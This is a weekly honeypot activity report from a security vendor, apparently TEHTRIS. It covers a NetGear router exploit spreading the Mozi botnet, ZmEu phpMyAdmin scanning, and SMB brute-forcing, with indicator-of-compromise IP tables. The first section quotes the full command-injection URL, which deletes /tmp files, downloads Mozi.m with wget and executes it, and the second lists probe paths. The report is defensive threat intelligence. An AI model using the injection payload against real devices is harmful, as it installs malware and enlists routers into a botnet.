CERTCERT

Honeypots: activity of the week 51

This week, TEHTRIS is referring to 3 malicious activities observed on its international honeypot network.

IP addresses unknown from public blacklists hosted in China targeting NetGear routers

The default gateway IP for your router is 192.168.1[.]1.

This week, 22 unique IP addresses performed the following URL request on more than half of our European honeypots :

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192.168.1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1

The goal of the cybercriminal is to get files from the by default IP address of the NetGear router:  192.168.1[.]1.

In this request, we find also the ‘Mozi.m’ that corresponds to Mozi botnet. In 2019, researchers at  Netlab found out that this botnet was spreading through vulnerabilities, especially on IoT. In general, Mozi is used to perform DDoS attacks, to execute the payload from the specified URL or to execute system or custom commands

Attempts to exploit NetGear routers have been observed since 2018 on DGN1000 versions, for which the vulnerability that allows remote code execution has been discovered in 2017. These attack attempts have never stopped evolving since.

IoCs :

IPASCountry
112.94.97[.]143
120.85.112[.]76
120.85.114[.]114
120.85.114[.]125
120.85.117[.]63
120.85.183[.]140
120.85.186[.]39
120.85.91[.]174
220.198.204[.]108
220.198.205[.]193
27.47.3[.]48
AS 17622 China Unicom Guangzhou networkCN
120.86.237[.]42
120.86.238[.]9
120.86.239[.]161
120.86.255[.]200
27.43.180[.]192
27.43.205[.]168
AS 17816 China Unicom IP network China169 Guangdong provinceCN
121.206.154[.]170
175.4.219[.]195
49.119.92[.]28 223.149.242[.]216
AS 4134 ChinanetCN
178.72.70[.]56AS 44257 MTS PJSCRU

Out of these 22 unique IP addresses, 12 (in bold in the chart above) – which means more than half – are unknown from public databases of malicious IP. The others remain little known. Moreover, 21 are hosted by AS localized in China.

TEHTRIS recommends patching router and always update versions as soon as it is available.

ZmEu: a crawler bot looking for vulnerabilities in phpMyAdmin

This week, in the top 10 of monitored user agents, ZmEu performed a special entrance with nearly 500 hits. ZmEu is a crawler bot is a computer vulnerability scanner which searches for web servers that are open to attack through the phpMyAdmin program (vulnerable versions of the mySQL administration software). It also attempts to guess SSH passwords through brute-force methods and leaves a persistent backdoor. This crawler bot would have been developed in Romania and has been rampant since 2012.

URL requests monitored on our honeypots :

/w00tw00t.at.blackhats.romanian.anti-sec:)
/pma/scripts/setup.php
/phpmyadmin/scripts/setup.php
/phpMyAdmin/scripts/setup.php
/myadmin/scripts/setup.php
/MyAdmin/scripts/setup.php

The ZmEu tool performs automatic scans by searching for classic paths to site configurations.

These URL requests were performed by 6 unique IP addresses, all identified as malicious IP in public blacklists, on all our European honeypots.

IoCs :

IPASCountry
165.232.160[.]6AS 14061 DIGITALOCEAN-ASNSG
188.166.5[.]240AS 14061 DIGITALOCEAN-ASNNL
167.71.60[.]238AS 14061 DIGITALOCEAN-ASNDE
157.230.110[.]53AS 14061 DIGITALOCEAN-ASNDE
165.22.24[.]138AS 14061 DIGITALOCEAN-ASNDE
95.179.164[.]71AS 20473 AS-CHOOPADE

To secure Web servers against this threat, TEHTRIS recommends using and updating to the latest version of PhPMyAdmin.

Persistence of bruteforce attacks on the SMB protocol by unknown IP addresses from public blacklists of malicious IP

This week, 8 IP addresses (in bold in the chart below) out of the top 10 of IP addresses performing bruteforce attempts on protocol SMB on our honeypots, are unknown from malicious blacklists databases of IP carrying out malicious activities. 4 of them are hosted in South America, as observed in week 48.

IoCs :

IPASCountry
88.204.241[.]10 AS 9198 JSC KazakhtelecomKZ
114.32.253[.]93 AS 3462 Data Communication Business GroupTW
189.203.208[.]115 AS 22884 TOTAL PLAY TELECOMUNICACIONES SA DE CVMX
200.119.215[.]68 AS 25620 COTAS LTDA.BO
152.231.117[.]93 AS 27651 ENTEL CHILE S.A.CL
186.96.10[.]37 AS 22884 TOTAL PLAY TELECOMUNICACIONES SA DE CVMX
119.161.98[.]151 AS 139195 Seans Media Pvt LtdIN
142.190.96[.]94 AS 13760 UNITI-FIBERUS
119.93.147[.]253 AS 9299 Philippine Long Distance Telephone CompanyPH
45.225.194[.]141 AS 266948 IBIUNET MULTIPLAYBR